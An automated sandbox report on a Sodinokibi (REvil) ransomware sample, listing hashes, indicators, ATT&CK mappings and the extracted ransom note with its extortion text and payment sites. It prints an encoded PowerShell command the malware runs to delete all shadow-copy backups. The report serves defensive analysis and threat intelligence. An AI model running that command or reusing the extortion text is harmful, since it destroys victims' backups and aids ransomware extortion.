sodinokibi | ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195

Analysis

max time kernel
146s
max time network
149s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
15/06/2024, 11:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
Size

115KB
MD5

63a945da1a63a8e56e8220c4ccf7fd0c
SHA1

a99cf1a2426edeac97c789d0a4b7d38606d7aa45
SHA256

ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195
SHA512

34006d84587ea90e243ebe0dd6bde8bd502ed688001a412898cd4e4c16a5de5788a9fa4c53d3ea79e4307adaa74496e05b205bf9717ac833db976551b1a7c89c
SSDEEP

1536:ikB/Ih3+7QuoZVQgf5GV2jSzGpAyZ4ICS4AwnfxnuLdSbSmoNUExd9M4dgS:gFW7gSzKDin5nWhw4dgS

Score

10^/10

sodinokibi ransomware

Malware Config

Extracted

Path

C:\Users\of009-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension of009. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). We have copied financial files and other important information about personal data, it will be published on the Internet or will be used against you if you do not pay us, so if you do not want such consequences as customer churn, media coverage, fines like GDRP and other damages, we recommend you to contact us and pay the ransom. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F8E70BCCD1AA0F03 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F8E70BCCD1AA0F03 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: mUyn9QWesrJqME1P7JDRLSkW1aje/wl0hUTVWpxwVoW9FmsbB/x1/3nu2QbV/IVv pZLCXU8cay31asnnygjhuBpACnx+VNKpsWS127qFwRCAx5X/Opp4d4HFVhLuKEXc hwgsACt3jyZrQa5rgCR3OThRNnMFXOIhuISJ+JPpC5vAmqfznNDglr9ORTN9S6de EvE/SKsJ/jdHf6X0mH+BaNs1p4HCdpUEkiuYRBrzXIcy1nbadnixnF6psungPd6S yJPnsL1iqwfL8/ENAGDLNtFmmjZdp6TeaQ81j2WEUO4gzt+rt59giaym6KkEU3SW UBeNSo7/CeKkCMvgFkhY2bwmHGY4e5vf68+cQAlNJnGdq21tSFCCrWg3bbmMXKtU Kx7s9Uy2xiWGAykr/OqSjHYECtd7zxrLjXRL0IC6w3Jzn6JACx2thP+3mYdvojm/ rubA05I0heVuMJql9mQoGPz7QjZcvMbgKjiamo4QajiRdvYmUI8s3SWuhoH0Himq 13a4W7kFlD23Vf11aP2+7QzqJudcdP3hjzuS1h3uwWM7S/yCdpxeDxzGkfTZA/me 4BuyMjcdj0LbXDQURVZySLTQDpHo4gU0JnrNMSNE1ZhEfGHTjeFWeR5u2+6STbzz rsvwWA8wJpd56qw0KmQBSFdRkAV59X7Q1Qkeu6L8X6i9Es9PLpH9sWUqakPyZatb s6+4V7Oet1tM8chTtVXxH30aQVy55UnFoyRnrdQToHFoApGa7b8z4Goh7k0/XYNP v0YOtAu+7L7ZBRHA9Dwi45L9zEHouucL2RIrm2dVwq2s5iPHz3ezJ7JwoY00W22D HAUDoe25VdeLUU7nVBCxpzX3RRU8RNvNAPY+V8MeBjzSABaEuAHW0nlAKt8UXGzL HyK76MYyID1pqzVaDufFvwuMI/ta8ntZjUfFYzeZKAaEXbBJ78r/OHqfCXiHesR+ 50mwbzuhAcmOcTMwp9hj9XVCyBACYsvheNRX+/JanQ11ucCTBWvj/Aao6/DWWzI0 784DpZ+pnb524+CWxYB8i+MAJhU0r206h06LXMTyKiQ1+dOHq1WweNfxeK+oklWQ cN2jTimKM7Y4b7kTOAo657C24zC/sIiOfatrbxJK/OgGIKJ8EIjtUM460lreBvb2 QP522bwlETa4AHX8Uf+TjmexprujkLmrJplwnIgYAcy0K+rcsWnpWRAbYNsx8Kyc 1cRn6n9gMrj8JoGQ/+NWb2h+W938+bzB8z4CXs1lL3mTg1eQZaibo24oAyr0wmNF mYX+fQZMKf/e6XuaPfl4/UTuTXhegDRXwDGrSiQ5yY79d/+UOdGk524QjYlaHXwi /7veBaVG7ZsbdEBFfXoYaBbhzi6a0zDpAl1JuuQyeUIB4F/V ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F8E70BCCD1AA0F03

http://decryptor.cc/F8E70BCCD1AA0F03

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\G:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\H:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\U:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\Y:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\F:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\J:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\O:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\R:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\D:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\B:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\P:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\T:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\X:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\I:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\L:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\E:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\K:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\M:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\N:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\S:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\V:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\A:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\W:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\Q:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened (read-only)	\??\Z:	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\thz744og2a75.bmp"	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Drops file in Program Files directory 30 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\ConvertMove.jfif	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\TraceProtect.ex_	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ApproveCompare.search-ms	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\TraceProtect.dib	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\AddCompress.mpeg	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\PopRename.vdx	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\RegisterUnprotect.wm	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UnprotectCheckpoint.fon	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UnregisterResume.ppsm	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\CloseDismount.nfo	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\GetUse.mpv2	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\JoinOpen.pot	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\MergeRedo.midi	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UnblockDebug.jpeg	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\BackupSelect.docm	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ConfirmRestore.docx	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\RepairPublish.wm	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\RestoreUse.mpp	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\UnblockConvert.xml	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File created	\??\c:\program files\of009-readme.txt	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\ImportUnprotect.potx	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\NewUpdate.tiff	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File created	\??\c:\program files (x86)\of009-readme.txt	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\CompareLimit.vsx	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\SplitDismount.ogg	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\StartConnect.TS	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\CheckpointWrite.doc	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\DismountInstall.php	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\InvokeRestore.ADT	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
File opened for modification	\??\c:\program files\RequestConvertTo.png	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4748	powershell.exe
4748	powershell.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeBackupPrivilege	1516	vssvc.exe
Token: SeRestorePrivilege	1516	vssvc.exe
Token: SeAuditPrivilege	1516	vssvc.exe
Token: SeTakeOwnershipPrivilege	4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4796 wrote to memory of 4748	4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe	80
PID 4796 wrote to memory of 4748	4796	ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe	80

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe
"C:\Users\Admin\AppData\Local\Temp\ffe7fe45327645a48ca83b7dd4586de22618206001b7a7354d9d285e0308f195.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4748

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:4872

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m5rujzgl.1jt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\of009-readme.txt

Filesize
7KB

MD5
e9fb1bda3ca7ba8803adc9abe5c379e9

SHA1
1437a7eaae40ec09175d036e776513ba3b684618

SHA256
c7a8f0ed6b16762120ef4df4d0b396d0cbc2ff4dfd50a4771c3d8162c6815bd9

SHA512
7965b04f280b598ffb5c62a9a65b3446dcd0737a637f40ad0dca19557f60802ef6dd07407b17d4cdda337b53ab1e6a01ecec186e2f22abc846264506591b3aeb

Download Submit
memory/4748-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

Filesize
8KB

Download
memory/4748-9-0x000001FBEE140000-0x000001FBEE162000-memory.dmp

Filesize
136KB

Download
memory/4748-10-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Filesize
10.8MB

Download
memory/4748-11-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Filesize
10.8MB

Download
memory/4748-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Filesize
10.8MB

Download
memory/4748-15-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

Filesize
10.8MB

Download